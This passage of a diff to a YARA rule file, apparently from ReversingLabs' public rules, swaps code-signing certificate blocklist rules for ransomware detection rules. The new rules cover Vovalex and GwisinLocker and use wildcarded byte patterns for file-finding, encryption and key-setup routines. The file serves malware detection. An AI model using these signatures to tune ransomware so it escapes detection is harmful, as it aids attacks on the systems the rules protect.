+            24 ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 5E
+        }
+		$encrypt_files_angus_version = {
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43
+            8D ?? ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? B9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 39 8D ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 42 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ??
+            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ??
+            ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x9D\\x8E\\xE9\\x9B\\xAA\\xE6\\xA2\\x85" and pe.signatures [ i ] . serial == "3b:c3:ba:e4:11:8d:46:f3:fd:d9:be:ee:ab:74:9f:ee" and 1442275199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( ( all of ( $encrypt_files_p* ) ) or ( $encrypt_files_angus_version ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0F0449F7691E5B4C8E74E71Cae822179 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Vovalex : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Vovalex ransomware."
 		author = "ReversingLabs"
-		id = "17c99772-f2f9-56bc-be01-d9f62626a9ff"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "dd4d7969-1afc-5e5d-9324-89f432523173"
+		date = "2021-03-12"
+		modified = "2021-03-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1708-L1724"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f8d3593b357f27240a4399e877ae9044f783bb944ad47ec9fe8bbecc63be864c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.Vovalex.yara#L1-L81"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0c0f065224988bcba45b5aba2dceb080479b0bab235d544daabc3cae72e48318"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Vovalex"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B BD ?? ?? ?? ??
+            48 89 BD ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48
+            89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48
+            8B 9D ?? ?? ?? ?? 48 8B 53 ?? 48 8B 03 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48
+            8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 83 F8 ?? 75 ?? 48 8B B5 ??
+            ?? ?? ?? 48 8B 56 ?? 48 8B 06 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 95 ??
+            ?? ?? ?? 8B 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 9D ?? ?? ??
+            ?? 48 8B 53 ?? 48 8B 03 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ??
+            ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 48 83
+            EC ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 89 9D ?? ??
+            ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 89 85 ?? ?? ?? ?? 48 89 9D ?? ?? ?? ?? 48 8D 15 ??
+            ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ??
+            48 89 8D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 9D ?? ?? ?? ??
+            48 89 9D ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 0D
+            ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 85 ?? ?? ?? ?? 48 89 95 ??
+            ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 1D ??
+            ?? ?? ?? 48 89 9D ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 89 8D ??
+            ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? B9 ?? ?? ??
+            ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4
+        }
+		$find_files_p1 = {
+            48 89 C6 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83
+            EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 06 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC
+            ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89
+            46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89
+            C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ??
+            ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83
+            C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83
+            C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D
+            0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ??
+            ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48
+        }
+		$find_files_p2 = {
+            89 C3 48 8B 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 03 48 89 53 ?? 48 8D 15 ?? ??
+            ?? ?? BF ?? ?? ?? ?? 48 89 7B ?? 48 89 53 ?? 48 8D 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 48
+            89 43 ?? 48 89 4B ?? 48 89 9D ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 45 31 C0
+            4C 89 85 ?? ?? ?? ?? 4C 8D A5 ?? ?? ?? ?? 49 C7 04 24 ?? ?? ?? ?? 49 8B 14 24 48 89
+            95 ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D AD ?? ?? ?? ?? 49 B9 ?? ?? ?? ?? ?? ?? ??
+            ?? 4D 89 4D ?? 49 8B 4D ?? 48 89 8D ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D B5 ?? ??
+            ?? ?? 4D 89 06 49 8B 16 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ??
+            45 31 C0 41 3B C0 7E ?? 41 BF ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ??
+            4D 69 D7 ?? ?? ?? ?? 4D 89 11 4C 89 D2 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ??
+            ?? 48 83 C4 ?? 45 31 C0 41 3B C0 79 ?? 4C 89 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48
+            C7 01 ?? ?? ?? ?? 48 8B 01 48 89 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 8D ?? ??
+            ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 85 C0 7E ?? 48 8B 9D ?? ?? ?? ?? 48 B8
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 EB
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SBO INVEST" and pe.signatures [ i ] . serial == "0f:04:49:f7:69:1e:5b:4c:8e:74:e7:1c:ae:82:21:79" and 1432079999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_43Db4448D870D7Bdc275F36A01Fba36F : INFO FILE
+rule REVERSINGLABS_Linux_Ransomware_Gwisinlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GwisinLocker ransomware."
 		author = "ReversingLabs"
-		id = "47b3e681-87ae-5e70-8d02-18aa0daab0dc"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "9f00e1b4-3692-5824-b614-724073532c1f"
+		date = "2022-10-11"
+		modified = "2022-10-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1726-L1742"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "951e35e2c3f1bd90a33f8b76b6ede5686ee9b9c97a4c71df5b9dff15956209c5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Linux.Ransomware.GwisinLocker.yara#L1-L354"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c23c0b73bbefbd644ffe1398e1f14eec3a89945cb3c3ccbc6f46c57046b53505"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GwisinLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$init_key_v1 = {
+            55 57 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D 74 24 ?? 56 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 31 FF 83 EC ?? 56 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89
+            F8 5B 5E 5F 5D C3 66 90 31 D2 31 C0 89 54 04 ?? 83 C0 ?? 83 F8 ?? 72 ?? 83 EC ?? 8D
+            83 ?? ?? ?? ?? 50 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 C5 8D 7C 24 ?? 85
+            C0 74 ?? 50 6A ?? 6A ?? 57 E8 ?? ?? ?? ?? 89 2C 24 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ??
+            6A ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? C7 04 24 ?? ?? ?? ?? 83 EC ?? 8D 44
+            24 ?? 50 FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 6A ?? FF B3
+            ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 56 FF B3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            0F 94 C0 0F B6 C0 89 C7 E9
+        }
+		$encrypt_files_v1_p1 = {
+            55 B9 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8B 84
+            24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 84 24
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 83 EC ?? 89 44 24 ?? 89
+            C7 31 C0 F3 AB C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? 6A ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 89 44
+            24 ?? 8D 84 24 ?? ?? ?? ?? 89 44 24 ?? 31 FF 83 EC ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8
+            ?? ?? ?? ?? 58 5A 6A ?? FF 74 24 ?? E8 ?? ?? ?? ?? 59 5E 6A ?? FF 74 24 ?? E8 ?? ??
+            ?? ?? 81 C4 ?? ?? ?? ?? 89 F8 5B 5E 5F 5D C3 8D 74 26 ?? 90 83 EC ?? 6A ?? 8D 84 24
+            ?? ?? ?? ?? 89 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D B4 24 ?? ?? ?? ?? 89 74 24 ??
+            85 C0 74 ?? 83 EC ?? 6A ?? FF 74 24 ?? 56 E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 59 5E 50
+            89 C5 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? 89 C6 83 C4 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 89 C7 FF B4 24 ??
+            ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 01 FA 89 D0 8B 54
+            24 ?? 89 10 0F B7 54 24 ?? 66 89 50 ?? 0F B6 54 24 ?? 88 50 ?? 8B 94 24 ?? ?? ?? ??
+            C6 44 3A ?? ?? BF ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ??
+            ?? ?? ?? B9 ?? ?? ?? ?? 83 C4 ?? 39 C1 B9 ?? ?? ?? ?? 19 D1 7D ?? 83 EC ?? FF B4 24
+            ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 EC ?? FF 74
+            24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 74 26 ?? 90 83 EC ?? 56 E8 ?? ?? ??
+            ?? 58 5A 55 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? 89 C6 83 C4 ?? 85 C0 0F
+        }
+		$encrypt_files_v1_p2 = {
+            84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 8B 74 24
+            ?? 8B 7C 24 ?? 89 D1 89 74 24 ?? 89 7C 24 ?? 83 C4 ?? 39 F0 19 F9 7D ?? 89 44 24 ??
+            89 54 24 ?? 8B 7C 24 ?? 8B 74 24 ?? 89 F9 89 F5 C1 F9 ?? 89 C8 89 4C 24 ?? 31 CD 8B
+            74 24 ?? C1 F8 ?? 89 44 24 ?? 89 E8 29 F0 8B 74 24 ?? 89 C7 83 E7 ?? 31 CF 89 F8 8B
+            7C 24 ?? 29 F0 8B 74 24 ?? 89 FA 19 FA 8B 7C 24 ?? 29 C6 89 74 24 ?? 19 D7 83 EC ??
+            89 7C 24 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ??
+            B9 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 31 C0 F3 AB 89 94 24 ?? ?? ?? ?? 56 6A ?? FF 74
+            24 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 C7 85 C0 0F 84 ?? ?? ?? ?? 83
+            EC ?? FF 74 24 ?? E8 ?? ?? ?? ?? 5F 5D FF B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 89 C7 85 C0 0F 84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 8B 54 24 ?? 31 FF 8B 44 24 ??
+            89 7C 24 ?? 89 74 24 ?? 8D 74 24 ?? 89 D7 89 74 24 ?? 8D B3 ?? ?? ?? ?? 09 C7 89 74
+        }
+		$encrypt_files_v1_p3 = {
+            24 ?? 0F 84 ?? ?? ?? ?? 8B 4C 24 ?? 8B 6C 24 ?? 89 4C 24 ?? EB ?? 66 90 83 EC ?? 31
+            ED FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF 74 24 ?? FF 74
+            24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 31 D2 6A ?? 8B 84 24 ?? ?? ?? ?? 52 F7 D8
+            50 57 E8 ?? ?? ?? ?? 57 FF B4 24 ?? ?? ?? ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 44 24 ?? 8B BC 24 ?? ?? ?? ?? 8B 54 24 ?? 29 F8 19 EA 89 44 24 ?? 89 D6 89 54
+            24 ?? 83 C4 ?? 09 C6 74 ?? 39 84 24 ?? ?? ?? ?? 89 E9 8B 7C 24 ?? 19 D1 0F 4C 84 24
+            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ??
+            ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 57
+            FF B4 24 ?? ?? ?? ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 39 84 24 ??
+            ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 EC ?? BF ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? E9 ?? ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? E9
+        }
+		$find_files_v1_p1 = {
+            55 89 C5 57 E8 ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 89 54 24 ?? 8B
+            B4 24 ?? ?? ?? ?? 89 7C 24 ?? 89 FB 89 4C 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 85 C0 74 ?? 8D 58 ?? 80 7C 05 ?? ?? 0F 45 D8 89 5C 24 ??
+            8B BC 24 ?? ?? ?? ?? 83 E7 ?? 74 ?? 83 EC ?? 8D 44 24 ?? 89 44 24 ?? 50 55 6A ?? 8B
+            5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 8B 00 83 F8
+            ?? 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8D
+            B4 26 ?? ?? ?? ?? 66 90 83 EC ?? 8D 44 24 ?? 89 44 24 ?? 50 55 6A ?? 8B 5C 24 ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 78 ?? 8B 84 24 ?? ?? ?? ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C6 44 24 ?? ?? 31 FF C7 44 24 ??
+            ?? ?? ?? ?? 8B 54 24 ?? 8B 44 24 ?? F6 84 24 ?? ?? ?? ?? ?? 74 ?? 85 F6 0F 84 ?? ??
+            ?? ?? 8B 4E ?? 8B 5E ?? 31 D1 31 C3 09 CB 0F 84 ?? ?? ?? ?? 31 FF 81 C4 ?? ?? ?? ??
+            89 F8 5B 5E 5F 5D C3 8D 74 26 ?? 90 8B 5C 24 ?? E8 ?? ?? ?? ?? 89 C7 8B 00 83 F8 ??
+            0F 85 ?? ?? ?? ?? 83 EC ?? FF 74 24 ?? 55 6A ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8D 74 26 ?? 90 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ??
+            ?? ?? 89 74 24 ?? 89 44 24 ?? 89 54 24 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 46 ?? 8B 4C 24
+            ?? 83 C0 ?? 83 C1 ?? 89 44 24 ?? 89 44 24 ?? 8B 46 ?? 89 4C 24 ?? 89 4C 24 ?? 89 44
+        }
+		$find_files_v1_p2 = {
+            24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8B
+            84 24 ?? ?? ?? ?? 83 E0 ?? 89 44 24 ?? 75 ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ??
+            55 8B 44 24 ?? FF D0 89 C7 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 F6 74 ?? 8B 84 24 ??
+            ?? ?? ?? 8B 5C 24 ?? 89 6C 24 ?? 8B 4C 24 ?? 8B BC 24 ?? ?? ?? ?? 89 C5 EB ?? 8D B6
+            ?? ?? ?? ?? 8B 36 85 F6 74 ?? 8B 46 ?? 8B 56 ?? 31 D8 31 CA 09 C2 75 ?? 8B 46 ?? 8B
+            56 ?? 31 E8 31 FA 09 C2 0F 84 ?? ?? ?? ?? 8B 36 85 F6 75 ?? 8B 6C 24 ?? 8B 7C 24 ??
+            85 FF 74 ?? 80 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B 44 24 ?? C6 44 05 ?? ?? 8B 44 24 ??
+            85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ?? 55 8B 44 24 ?? FF D0
+            83 C4 ?? 89 C7 81 C4 ?? ?? ?? ?? 89 F8 5B 5E 5F 5D C3 66 90 83 EC ?? 6A ?? 55 8B 5C
+            24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 44 24 ?? 89 C7 E8 ?? ?? ?? ?? 8B 00 89 44 24 ??
+            83 C4 ?? 85 FF 79 ?? 83 F8 ?? 0F B6 4C 24 ?? BA ?? ?? ?? ?? 0F 94 C0 84 C0 B8 ?? ??
+            ?? ?? 0F 44 44 24 ?? 0F 45 CA 89 44 24 ?? 88 4C 24 ?? 8B 44 24 ?? 85 C0 0F 85 ?? ??
+            ?? ?? 83 EC ?? FF 74 24 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D B4
+            26 ?? ?? ?? ?? 8D 76 ?? 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 48 ?? 89 4C 24 ?? 89 4C 24 ?? 85 C0 74 ?? 80 7C 05
+            ?? ?? 74 ?? E9 ?? ?? ?? ?? 8D 76 ?? 80 7C 05 ?? ?? 0F 85 ?? ?? ?? ?? 83 E8 ?? 75 ??
+            31 D2 89 54 24 ?? E9 ?? ?? ?? ?? 8D 74 26 ?? 90 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89
+        }
+		$find_files_v1_p3 = {
+            44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 54 24 ?? E9 ?? ?? ?? ?? 90
+            8B 84 24 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? 83 E0 ?? 83 F8 ?? 19 C0 83 E0 ??
+            83 C0 ?? 89 44 24 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 90 8B 74 24 ?? 85 F6 0F 88
+            ?? ?? ?? ?? 83 EC ?? FF 74 24 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 C6 85 C0 0F
+            84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 44 24 ?? 89 44 24 ?? 8D B4 26 ?? ?? ?? ?? 8D 76 ??
+            83 EC ?? 56 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 80 78 ?? ??
+            0F 84 ?? ?? ?? ?? 83 EC ?? 8D 78 ?? 57 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B 44 24
+            ?? 0F 83 ?? ?? ?? ?? 8B 44 24 ?? 83 EC ?? C6 44 05 ?? ?? 57 8B 44 24 ?? 01 E8 50 8B
+            5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 5A 5B 8D 48 ?? 8D 44 24 ?? 50 89 E8 FF B4 24 ??
